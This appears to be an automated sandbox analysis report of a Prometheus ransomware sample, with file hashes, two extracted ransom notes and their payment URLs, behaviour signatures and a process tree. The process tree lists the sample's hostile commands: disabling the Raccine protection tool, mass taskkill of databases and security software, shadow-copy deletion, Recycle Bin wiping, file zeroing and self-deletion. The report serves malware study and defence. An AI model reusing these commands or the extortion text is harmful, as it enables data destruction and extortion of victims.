Overview

overview

10

Static

static

8c723af5c8...e7.exe

windows7_x64

10

8c723af5c8...e7.exe

windows10_x64

10

Analysis

  • max time kernel
    38s
  • max time network
    36s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    10-07-2021 19:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7.exe

  • Size

    142KB

  • MD5

    e1f063d63a75e0e0e864052b1a50ab06

  • SHA1

    75d941a28cf0ade2ef2c16dfacbdeb36a51ccaf7

  • SHA256

    8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7

  • SHA512

    25681b210ee18bd60ba3fef496769283d51dc516569e1f1834d6d23a5927c1684b25ff67baf5fba66c908b364a13784f49facdde7a98b2fb8a8a41a2ec792ae3

Score
10/10
prometheusevasionpersistenceransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Family

prometheus

Ransom Note
YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. -------------------------------------------------------------------------------- We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. -------------------------------------------------------------------------------- As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it's run. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. -------------------------------------------------------------------------------- !!!!!!!!!!!!!!!!!!!!!!!! If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. !!!!!!!!!!!!!!!!!!!!!!!!! -------------------------------------------------------------------------------- It doesn't matter to us what you choose pay us or we will sell your data. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: ____________________________________________________________________________________ You have two ways: 1) [Recommended] Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454 and paste it in the Tor browser. c. Start a chat and follow the further instructions. 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a. Open your any browser (Chrome, Firefox, Opera, IE, Edge) b. Open our secondary website: http://prometheusdec.in/ticket.php?track=141-5D9-Y454 c. Start a chat and follow the further instructions. Warning: secondary website can be blocked, thats why first variant much better and more available. _____________________________________________________________________________________ Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: HdUNlIbhrSJ42h/QRLAyQEam51tZFZAmeI698bh6dYbQIYX5xU3bo9lumV60qZrytXlVAaGfe9jdqTPbr/xU4dbYM7fDbwrQUHuDXBVKhNq/+nr9HJOC4gXIKFJI86h7mvGqj1c/vMSpnpa/aeYHfTBf188Fll/hlfNDSo8cpLiJWLvo6gfwypNI6eKjh0t3WtDsOzSUwysqj4Zn1O+LNjq6Owsos4/mdbZL8k/0roysHqgCOJAsAYRKDNo/a+6JB93h4Ej/+puzE/TM3TijPI5vpj+PwPxqISt70KVd1CJyta5nd0ri0B1sx8yjwgt0reMNn7Kq9/QUULUkkZPMK5G+6RaaF9/LVoSN853jBwNwsF+wnXKpxbH2W2DHeqXWPFB2wQ4ntNiXy2D1Abx2WmwQzyE5/dDMVoHWKoPWBK6xHLxHwm88uSElTP+OmWLArE/Y+ktRXlpv2OQgjpMpc0qOLRFVHIYOqbUzdVhxcPJrnG5Y8VI86up7whJuPp5QXcKAC2WL96hRJScXjiaZPCjwtEkbQZ5+RuYUO+nWgiGWh9T9YNx5Rdzn4H22fiI4OMkXgrcLc1+AjPvUP2kQgrIBXbLQZQ6yIqDhatJsdkKZbH4pYwveU19VUAB1w7xDf5y7L5h8APAdoa4jnX6nacw4k4N7wDss1AwbCeyLezo=
URLs

http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454

http://prometheusdec.in/ticket.php?track=141-5D9-Y454

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Family

prometheus

Ransom Note
YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it’s installation. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. It doesn't matter to us what you choose pay us or we will sell your data. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: You have two ways: 1) [Recommended] Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454 and paste it in the Tor browser. c. Start a chat and follow the further instructions. 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a. Open your any browser (Chrome, Firefox, Opera, IE, Edge) b. Open our secondary website: http://prometheusdec.in/ticket.php?track=141-5D9-Y454 c. Start a chat and follow the further instructions. Warning: secondary website can be blocked, thats why first variant much better and more available. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: HdUNlIbhrSJ42h/QRLAyQEam51tZFZAmeI698bh6dYbQIYX5xU3bo9lumV60qZrytXlVAaGfe9jdqTPbr/xU4dbYM7fDbwrQUHuDXBVKhNq/+nr9HJOC4gXIKFJI86h7mvGqj1c/vMSpnpa/aeYHfTBf188Fll/hlfNDSo8cpLiJWLvo6gfwypNI6eKjh0t3WtDsOzSUwysqj4Zn1O+LNjq6Owsos4/mdbZL8k/0roysHqgCOJAsAYRKDNo/a+6JB93h4Ej/+puzE/TM3TijPI5vpj+PwPxqISt70KVd1CJyta5nd0ri0B1sx8yjwgt0reMNn7Kq9/QUULUkkZPMK5G+6RaaF9/LVoSN853jBwNwsF+wnXKpxbH2W2DHeqXWPFB2wQ4ntNiXy2D1Abx2WmwQzyE5/dDMVoHWKoPWBK6xHLxHwm88uSElTP+OmWLArE/Y+ktRXlpv2OQgjpMpc0qOLRFVHIYOqbUzdVhxcPJrnG5Y8VI86up7whJuPp5QXcKAC2WL96hRJScXjiaZPCjwtEkbQZ5+RuYUO+nWgiGWh9T9YNx5Rdzn4H22fiI4OMkXgrcLc1+AjPvUP2kQgrIBXbLQZQ6yIqDhatJsdkKZbH4pYwveU19VUAB1w7xDf5y7L5h8APAdoa4jnX6nacw4k4N7wDss1AwbCeyLezo=
URLs

http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454

http://prometheusdec.in/ticket.php?track=141-5D9-Y454

Signatures

  • Prometheus Ransomware

    Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.

    ransomwareprometheus
  • Downloads MZ/PE file
  • Downloads PsExec from SysInternals website 1 IoCs

    Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

  • Modifies Windows Firewall 1 TTPs
    evasion
  • Modifies extensions of user files 1 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
    persistence
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 48 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7.exe
    "C:\Users\Admin\AppData\Local\Temp\8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7.exe"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Modifies WinLogon
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2020
    • C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1068
    • C:\Windows\system32\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
        PID:268
      • C:\Windows\system32\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        2⤵
        • Modifies registry key
        PID:968
      • C:\Windows\system32\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:1156
        • C:\Windows\system32\sc.exe
          "sc.exe" config Dnscache start= auto
          2⤵
            PID:932
          • C:\Windows\system32\netsh.exe
            "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
            2⤵
              PID:544
            • C:\Windows\system32\sc.exe
              "sc.exe" config SQLTELEMETRY start= disabled
              2⤵
                PID:552
              • C:\Windows\system32\sc.exe
                "sc.exe" config FDResPub start= auto
                2⤵
                  PID:764
                • C:\Windows\system32\sc.exe
                  "sc.exe" config SSDPSRV start= auto
                  2⤵
                    PID:860
                  • C:\Windows\system32\sc.exe
                    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                    2⤵
                      PID:1796
                    • C:\Windows\system32\sc.exe
                      "sc.exe" config SstpSvc start= disabled
                      2⤵
                        PID:1884
                      • C:\Windows\system32\sc.exe
                        "sc.exe" config SQLWriter start= disabled
                        2⤵
                          PID:1712
                        • C:\Windows\system32\sc.exe
                          "sc.exe" config upnphost start= auto
                          2⤵
                            PID:1364
                          • C:\Windows\system32\taskkill.exe
                            "taskkill.exe" /IM mspub.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:804
                          • C:\Windows\system32\taskkill.exe
                            "taskkill.exe" /IM synctime.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1084
                          • C:\Windows\system32\taskkill.exe
                            "taskkill.exe" /IM mspub.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1660
                          • C:\Windows\system32\netsh.exe
                            "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
                            2⤵
                              PID:320
                            • C:\Windows\system32\taskkill.exe
                              "taskkill.exe" /IM Ntrtscan.exe /F
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1904
                            • C:\Windows\system32\taskkill.exe
                              "taskkill.exe" /IM mydesktopqos.exe /F
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1716
                            • C:\Windows\system32\taskkill.exe
                              "taskkill.exe" /IM mysqld.exe /F
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1764
                            • C:\Windows\system32\arp.exe
                              "arp" -a
                              2⤵
                                PID:1336
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM mydesktopservice.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:688
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM isqlplussvc.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1372
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM sqbcoreservice.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1504
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM onenote.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:468
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM firefoxconfig.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1140
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM encsvc.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1616
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM PccNTMon.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:616
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM excel.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:864
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM agntsvc.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1788
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM msaccess.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1528
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM CNTAoSMgr.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:316
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM thebat.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1676
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM outlook.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1896
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM steam.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1644
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM sqlwriter.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1520
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM tmlisten.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2004
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM tbirdconfig.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:524
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM dbsnmp.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2016
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM dbeng50.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:980
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM msftesql.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:572
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM xfssvccon.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1780
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM thebat64.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1756
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM powerpnt.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1664
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM wordpad.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:820
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM ocomm.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1612
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM mydesktopqos.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1808
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM mysqld-opt.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1516
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM infopath.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1120
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM ocautoupds.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1684
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM visio.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1340
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM mbamtray.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:336
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM ocssd.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:936
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM mydesktopservice.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1768
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM oracle.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:584
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM winword.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:772
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM zoolz.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1620
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM sqlagent.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1056
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM mysqld-nt.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1172
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" IM thunderbird.exe /F
                                2⤵
                                • Kills process with taskkill
                                PID:1508
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM sqlbrowser.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1772
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM sqlservr.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1368
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
                                2⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1892
                              • C:\Windows\system32\cmd.exe
                                "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
                                2⤵
                                  PID:1616
                                • C:\Windows\system32\netsh.exe
                                  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                                  2⤵
                                    PID:1140
                                  • C:\Windows\system32\netsh.exe
                                    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
                                    2⤵
                                      PID:1368
                                    • C:\Windows\system32\arp.exe
                                      "arp" -a
                                      2⤵
                                        PID:820
                                      • C:\Windows\System32\mshta.exe
                                        "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
                                        2⤵
                                        • Modifies Internet Explorer settings
                                        PID:1400
                                      • C:\Windows\system32\cmd.exe
                                        "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                        2⤵
                                          PID:804
                                          • C:\Windows\system32\PING.EXE
                                            ping 127.0.0.7 -n 3
                                            3⤵
                                            • Runs ping.exe
                                            PID:1912
                                          • C:\Windows\system32\fsutil.exe
                                            fsutil file setZeroData offset=0 length=524288 “%s”
                                            3⤵
                                              PID:1056
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7.exe
                                            2⤵
                                            • Deletes itself
                                            PID:572
                                            • C:\Windows\system32\choice.exe
                                              choice /C Y /N /D Y /T 3
                                              3⤵
                                                PID:820

                                          Network

                                          MITRE ATT&CK Enterprise v6

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
                                            Filesize

                                            22KB

                                            MD5

                                            bf8e4443454ca3fe4546ff0a5f591007

                                            SHA1

                                            7ee56c5285b097ec90539a9ceec19f522cf4ff19

                                            SHA256

                                            204fa44cea4b9265a791ff02eebd153a2676f7d5690ffd92f08ba94a0a608222

                                            SHA512

                                            cee527a4d8a17f73aaad4c59784ab1dfe2b9e417e1d34716311e1fcda306cf089e7e65a8edffd5bf1a548492f897ddaf2882a020f464cb3f0d9365cc5de91fbe

                                            Download Submit

                                          • memory/268-64-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/316-96-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/320-80-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/336-116-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/468-89-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/524-102-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/544-71-0x000007FEFC141000-0x000007FEFC143000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/544-68-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/552-70-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/572-105-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/584-120-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/616-92-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/688-86-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/764-69-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/772-121-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/804-77-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/820-109-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/860-72-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/864-94-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/932-67-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/936-118-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/968-65-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/980-104-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1056-122-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1068-63-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1084-78-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1120-113-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1140-90-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1156-66-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1172-123-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1336-85-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1340-114-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1364-76-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1368-126-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1372-87-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1504-88-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1508-124-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1516-112-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1520-100-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1528-95-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1612-110-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1616-135-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1616-91-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1620-119-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1644-99-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1660-79-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1664-108-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1676-97-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1684-115-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1712-75-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1716-82-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1756-107-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1764-84-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1768-117-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1772-125-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1780-106-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1788-93-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1796-73-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1808-111-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1884-74-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1892-129-0x0000000001E30000-0x0000000001E31000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/1892-127-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1892-130-0x000000001AED0000-0x000000001AED1000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/1892-131-0x000000001AE50000-0x000000001AE52000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1892-132-0x000000001AE54000-0x000000001AE56000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1892-133-0x00000000022C0000-0x00000000022C1000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/1892-134-0x00000000023E0000-0x00000000023E1000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/1896-98-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/1904-83-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/2004-101-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/2016-103-0x0000000000000000-mapping.dmp

                                            Download

                                          • memory/2020-60-0x00000000002F0000-0x00000000002F1000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/2020-62-0x000000001B070000-0x000000001B072000-memory.dmp

                                            Filesize

                                            8KB

                                            Download